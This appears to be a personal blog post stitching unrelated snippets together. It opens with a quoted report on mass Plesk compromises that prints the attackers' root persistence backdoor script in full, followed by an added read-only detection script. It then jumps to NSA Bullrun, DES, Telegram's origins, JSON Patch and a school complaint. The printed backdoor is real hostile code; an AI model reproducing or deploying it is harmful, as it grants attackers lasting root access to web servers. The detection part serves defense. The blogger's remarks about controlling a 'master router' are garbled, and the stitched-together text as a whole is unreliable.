Saturday, August 27, 2016

Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??.. I heard a story, did you hear the same story?)

Attackers, using the bug http://kb.parallels.com/en/112303, were able to get access to PLESK installations and install backdoors in the systems. I’m using plural on backdoors, because it’s not just one, there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS="/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin"
export MYSUDO=""
for n in $PATHS; do export MYSUDO="$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)";done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=""
for n in $PATHS; do export PSAD="$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)";done
for PSADMD in $PSAD;do $MYSUDO "sed -i \"/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\" /etc/init.d/psa";$MYSUDO $PSADMD;done
$MYSUDO 'mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php'
$MYSUDO 'mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php'

In some cases, this file was hex encoded, in others in plain text form.

http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/ 
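
The traces that persist script leaves behind can be checked read-only, on a live host or on a mounted disk image. The function below is an added example, not part of the original post or the quoted article; the name scan_plesk_iocs and its ROOT parameter are assumptions, and the psadmd/psadmind and old.php findings should be compared against a known-good Plesk install before being treated as proof.

```shell
#!/bin/sh
# Added example (not from the original post): read-only triage for the
# indicators listed in the excerpt. ROOT is a hypothetical parameter: leave it
# empty for the live system or pass the mount point of a forensic disk image.
scan_plesk_iocs() {
  root=${1:-}
  hits=0
  hit() { printf 'IOC: %s\n' "$1"; hits=$((hits + 1)); }

  # 1. The persist script itself, in plain text or hex-encoded form.
  p="$root/dev/shm/persist"
  if [ -s "$p" ]; then
    if tr -d ' \n\r' < "$p" | grep -q '[^0-9A-Fa-f]'; then
      hit "$p present (plain text)"
    else
      hit "$p present (hex encoded)"
    fi
  fi

  for base in /opt/psa /usr/local/psa; do
    # 2. agent.php moved aside to old.php by the script's last two lines.
    ctl="$root$base/admin/htdocs/enterprise/control"
    [ -e "$ctl/old.php" ] && hit "$ctl/old.php exists (agent.php renamed?)"
    # 3. The psadmd/psadmind files the script searches for and launches.
    for d in "$base/bin" "$base/admin/bin"; do
      for name in psadmd psadmind; do
        [ -e "$root$d/$name" ] && hit "$root$d/$name exists"
      done
    done
  done

  # 4. Lines the sed call appends after daemon_name=sw-cp-serverd.
  init="$root/etc/init.d/psa"
  if [ -f "$init" ]; then
    bad=$(awk 'prev && /psadm(in)?d/ { print NR ": " $0; next }
               { prev = ($0 ~ /daemon_name=sw-cp-serverd/) }' "$init")
    [ -n "$bad" ] && hit "$init line $bad"
  fi

  [ "$hits" -eq 0 ]   # exit status 0 means none of the indicators were found
}
```

Call it as `scan_plesk_iocs ""` for the running system or `scan_plesk_iocs /mnt/image` for an offline copy; each finding is printed on a line starting with `IOC:`.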

If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe

Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques.

Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.

Then.. how to beat NSA as a superpower and become as powerful as them?

 

parity check bit

https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650 

In an interview with the New York Times, Durov said the idea of the messenger service came to him after Russia's Federal Security Service demanded that he delete opposition communities from his Vkontakte social network. After the demands were refused special service agents tried putting pressure on the programmer and searched his apartment and that of his parents. The entrepreneur then understood that he doesn't have a safe channel for communicating with friends and family, and so he decided to create a secure messaging app.

What I understand here is that client and server both agree on replacing the path.


Example:
[
  {"op": "replace", "path": "/_AliceVersion", "value": 1},
  {"op": "test", "path": "/_BobVersion", "value": 0},
  //...
  {"op": "replace", "path": "/some/where", "value": "something"}
]

https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization 

I just missed school for 3 months!!!! How the hell am I gonna make the semester??? My father is gonna kill me!!!

 and then...

Full guide on creating stateful Telegram bot

I have a couple of reasons to write this article. First of all I have a repository called ruby-telegram-bot-starter-kit, which contains a boilerplate for creating simple Telegram bots

https://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z